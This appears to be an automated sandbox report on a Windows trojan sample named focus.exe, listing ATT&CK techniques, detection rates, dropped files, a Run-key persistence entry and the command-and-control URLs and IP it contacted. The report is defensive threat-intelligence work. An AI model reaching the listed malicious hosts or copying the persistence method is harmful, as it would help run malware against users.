Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Process Injection512	Obfuscated Files or Information3	Credential API Hooking1	File and Directory Discovery3	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Registry Run Keys / Startup Folder1	Software Packing11	Security Account Manager	System Information Discovery125	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rootkit1	NTDS	Security Software Discovery241	Distributed Component Object Model	Credential API Hooking1	Scheduled Transfer	Application Layer Protocol113	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Process Discovery2	SSH	Clipboard Data1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion31	Cached Domain Credentials	Virtualization/Sandbox Evasion31	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation1	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection512	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
focus.exe	69%	Virustotal		Browse
focus.exe	29%	Metadefender		Browse
focus.exe	90%	ReversingLabs	Win32.Trojan.Phonzy

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\OptimFROG.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\OptimFROG.dll	4%	ReversingLabs
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\bass.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\bass.dll	2%	ReversingLabs
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\libdisplay4-1.dll	21%	Metadefender		Browse
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\libdisplay4-1.dll	50%	ReversingLabs	Win32.Trojan.Graftor
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	29%	Metadefender		Browse
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	69%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.0.focus.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
0.2.focus.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
2.2.player-toolkit.exe.10000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.thebosscollectionn.com	0%	Avira URL Cloud	safe
http://www.ordertds.com	0%	Avira URL Cloud	safe
http://www.buymysoft.com	0%	Avira URL Cloud	safe
http://www.ordertds.com/vns/	0%	Avira URL Cloud	safe
http://www.milkweedmagic.com/vns/	0%	Avira URL Cloud	safe
http://www.ocarlosresolve.com/vns/	0%	Avira URL Cloud	safe
http://www.wiitendo.com/vns/	0%	Avira URL Cloud	safe
http://www.LosslessAudio.org2	0%	Avira URL Cloud	safe
http://www.sparkspressworld.comReferer:	0%	Avira URL Cloud	safe
http://www.sparkspressworld.com/vns/	0%	Avira URL Cloud	safe
http://www.domennyarendi44.net/vns/www.milkweedmagic.com	0%	Avira URL Cloud	safe
http://www.sparkspressworld.com/vns/www.ocarlosresolve.com	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.innergardenhealing.space/vns/	0%	Avira URL Cloud	safe
http://www.lyricwiki.org	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.milkweedmagic.com/vns/www.buymysoft.com	0%	Avira URL Cloud	safe
http://www.athleticamackay.com/vns/www.xn--laclnicadelvnculo-gvbi.com	0%	Avira URL Cloud	safe
http://www.everydayresidency.com	0%	Avira URL Cloud	safe
http://www.ocarlosresolve.com/vns/www.athleticamackay.com	0%	Avira URL Cloud	safe
http://www.worklesshours.com/vns/	0%	Avira URL Cloud	safe
http://www.thebosscollectionn.com/vns/www.wiitendo.com	0%	Avira URL Cloud	safe
http://www.everydayresidency.comReferer:	0%	Avira URL Cloud	safe
http://www.everydayresidency.com/vns/www.sparkspressworld.com	0%	Avira URL Cloud	safe
http://www.athleticamackay.com/vns/	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.ocarlosresolve.com	0%	Avira URL Cloud	safe
http://www.wlwmwntor.com/vns/www.worklesshours.com	0%	Avira URL Cloud	safe
http://www.xn--laclnicadelvnculo-gvbi.com/vns/	0%	Avira URL Cloud	safe
http://www.worklesshours.comReferer:	0%	Avira URL Cloud	safe
http://www.milkweedmagic.comReferer:	0%	Avira URL Cloud	safe
www.hollandhousedesigns.design/vns/	0%	Avira URL Cloud	safe
http://www.forenvid.com/vns/	100%	Avira URL Cloud	malware
http://www.hollandhousedesigns.design/vns/M	0%	Avira URL Cloud	safe
http://www.thebosscollectionn.com/vns/	0%	Avira URL Cloud	safe
http://www.wiitendo.comReferer:	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.innergardenhealing.spaceReferer:	0%	Avira URL Cloud	safe
http://www.thebosscollectionn.comReferer:	0%	Avira URL Cloud	safe
http://www.forenvid.com	100%	Avira URL Cloud	malware
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.athleticamackay.comReferer:	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.worklesshours.com	0%	Avira URL Cloud	safe
http://www.wlwmwntor.comReferer:	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.xn--laclnicadelvnculo-gvbi.comReferer:	0%	Avira URL Cloud	safe
http://www.ocarlosresolve.comReferer:	0%	Avira URL Cloud	safe
http://www.hollandhousedesigns.designReferer:	0%	Avira URL Cloud	safe
http://www.wiitendo.com/vns/www.hollandhousedesigns.design	0%	Avira URL Cloud	safe
http://www.wlwmwntor.com	0%	Avira URL Cloud	safe
https://www.ordertds.com/vns/?BlP=7	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.wlwmwntor.com/vns/	0%	Avira URL Cloud	safe
http://www.everydayresidency.com/vns/	0%	Avira URL Cloud	safe
http://www.sparkspressworld.com	0%	Avira URL Cloud	safe
http://www.xn--laclnicadelvnculo-gvbi.com	0%	Avira URL Cloud	safe
http://www.athleticamackay.com	0%	Avira URL Cloud	safe
http://www.domennyarendi44.net/vns/	0%	Avira URL Cloud	safe
http://www.ordertds.comReferer:	0%	Avira URL Cloud	safe
http://www.domennyarendi44.netReferer:	0%	Avira URL Cloud	safe
http://www.buymysoft.com/vns/www.wlwmwntor.com	0%	Avira URL Cloud	safe
http://www.ordertds.com/vns/?BlP=7+ZKUnh4u9UMtKwB98gwx/ZO0djsvR0w/TFw058Z3BgI+IMtx40n++NUyS4P23cT16Wd&vFNL=UFNx8bfpixDd	0%	Avira URL Cloud	safe
http://www.buymysoft.com/vns/	0%	Avira URL Cloud	safe
http://www.xn--laclnicadelvnculo-gvbi.com/vns/www.innergardenhealing.space	0%	Avira URL Cloud	safe
http://www.forenvid.com/vns/www.thebosscollectionn.com	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ordertds.com	161.47.48.3	true	true		unknown
www.ordertds.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.ordertds.com/vns/	true	Avira URL Cloud: safe	unknown
www.hollandhousedesigns.design/vns/	true	Avira URL Cloud: safe	low
http://www.ordertds.com/vns/?BlP=7+ZKUnh4u9UMtKwB98gwx/ZO0djsvR0w/TFw058Z3BgI+IMtx40n++NUyS4P23cT16Wd&vFNL=UFNx8bfpixDd	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.thebosscollectionn.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ordertds.com	explorer.exe, 00000013.00000002.476720123.00000000065DD000.00000040.00000001.sdmp, wscript.exe, 00000018.00000002.466908835.00000000051F2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wikia.com/wiki/Wikia.	changelog.txt.0.dr	false		high
http://www.donationcoder.com/Software/Mouser/Updater/downloads/dcuhelper.zip	changelog.txt.0.dr	false		high
http://www.buymysoft.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.milkweedmagic.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ocarlosresolve.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.donationcoder.com/Software/Mouser/Updater/downloads/DcUpdaterSetup.exe	changelog.txt.0.dr	false		high
http://www.wiitendo.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.LosslessAudio.org2	OptimFROG.dll.0.dr	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.last.fm/api/submissions#subs	changelog.txt.0.dr	false		high
http://www.msn.com/de-ch/?ocid=iehpLMEMhh	wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	false		high
http://www.sparkspressworld.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sparkspressworld.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.domennyarendi44.net/vns/www.milkweedmagic.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sparkspressworld.com/vns/www.ocarlosresolve.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.innergardenhealing.space/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/?ocid=iehp	wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp, wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	false		high
http://www.lyricwiki.org	changelog.txt.0.dr	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.milkweedmagic.com/vns/www.buymysoft.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.athleticamackay.com/vns/www.xn--laclnicadelvnculo-gvbi.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.everydayresidency.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://skwire.dcmembers.com/fp/?page=trout	changelog.txt.0.dr	false		high
http://www.ocarlosresolve.com/vns/www.athleticamackay.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.worklesshours.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thebosscollectionn.com/vns/www.wiitendo.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/?ocid=iehph	wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp	false		high
http://www.everydayresidency.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	focus.exe	false		high
http://www.everydayresidency.com/vns/www.sparkspressworld.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.athleticamackay.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://lyrics.wikia.com.	changelog.txt.0.dr	false		high
http://www.msn.com/?ocid=iehpG	wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp	false		high
http://www.ocarlosresolve.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.wlwmwntor.com/vns/www.worklesshours.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	focus.exe	false		high
http://www.site.com/music/song.mp3.	changelog.txt.0.dr	false		high
http://www.xn--laclnicadelvnculo-gvbi.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/?ocid=iehpL	wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp	false		high
http://www.worklesshours.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.milkweedmagic.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.forenvid.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://www.hollandhousedesigns.design/vns/M	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thebosscollectionn.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.wiitendo.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/?ocid=iehpLMEM	wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://lyrics.wikia.com	changelog.txt.0.dr	false		high
http://www.innergardenhealing.spaceReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thebosscollectionn.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.forenvid.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://www.tiro.com	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.athleticamackay.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.worklesshours.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wlwmwntor.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netD	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.xn--laclnicadelvnculo-gvbi.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ocarlosresolve.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hollandhousedesigns.designReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wiitendo.com/vns/www.hollandhousedesigns.design	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wlwmwntor.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ordertds.com/vns/?BlP=7	wscript.exe, 00000018.00000002.467023538.000000000558F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.msn.com/de-ch/ocid=iehp	wscript.exe, 00000018.00000002.462977788.0000000002C08000.00000004.00000020.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.wlwmwntor.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.everydayresidency.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sparkspressworld.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xn--laclnicadelvnculo-gvbi.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.athleticamackay.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.domennyarendi44.net/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ordertds.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.domennyarendi44.netReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.buymysoft.com/vns/www.wlwmwntor.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autohotkey.com/forum/topic69642.html	changelog.txt.0.dr	false		high
http://www.buymysoft.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xn--laclnicadelvnculo-gvbi.com/vns/www.innergardenhealing.space	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/de-ch/?ocid=iehp	wscript.exe, 00000018.00000002.462977788.0000000002C08000.00000004.00000020.sdmp, wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.forenvid.com/vns/www.thebosscollectionn.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
161.47.48.3	ordertds.com	United States		19994	RACKSPACEUS	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	412792
Start date:	12.05.2021
Start time:	23:53:15
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 2s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	focus.com (renamed file extension from com to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@12/15@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 45.7% (good quality ratio 42.5%) Quality average: 72.2% Quality standard deviation: 30.6%
HCA Information:	Successful, ratio: 78% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 104.43.139.144, 104.42.151.234, 20.50.102.62, 23.218.208.56, 92.122.213.247, 92.122.213.194, 20.54.26.129, 205.185.216.42, 205.185.216.10, 2.20.143.16, 2.20.142.209, 20.82.209.183, 20.82.210.154 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:54:00	API Interceptor	794x Sleep call for process: player-toolkit.exe modified
23:55:30	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run K6M8V4IX5F C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
23:55:39	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run K6M8V4IX5F C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
RACKSPACEUS	executable.2772.exe	Get hash	malicious	Browse	23.253.46.64
	SwiftReport_11371201183146224.exe	Get hash	malicious	Browse	184.106.54.10
	IMG_INVOICE_6628862572.exe	Get hash	malicious	Browse	173.203.187.10
	PI.exe	Get hash	malicious	Browse	173.203.187.10
	swift copy.exe	Get hash	malicious	Browse	173.203.187.10
	product specification.xlsx	Get hash	malicious	Browse	162.209.114.201
	Proforma HBK Equip Req ozen-global 20.04.2021 cc (1).xlsx.exe	Get hash	malicious	Browse	146.20.161.10
	INVOICE N. 7.pdf.exe	Get hash	malicious	Browse	184.106.54.10
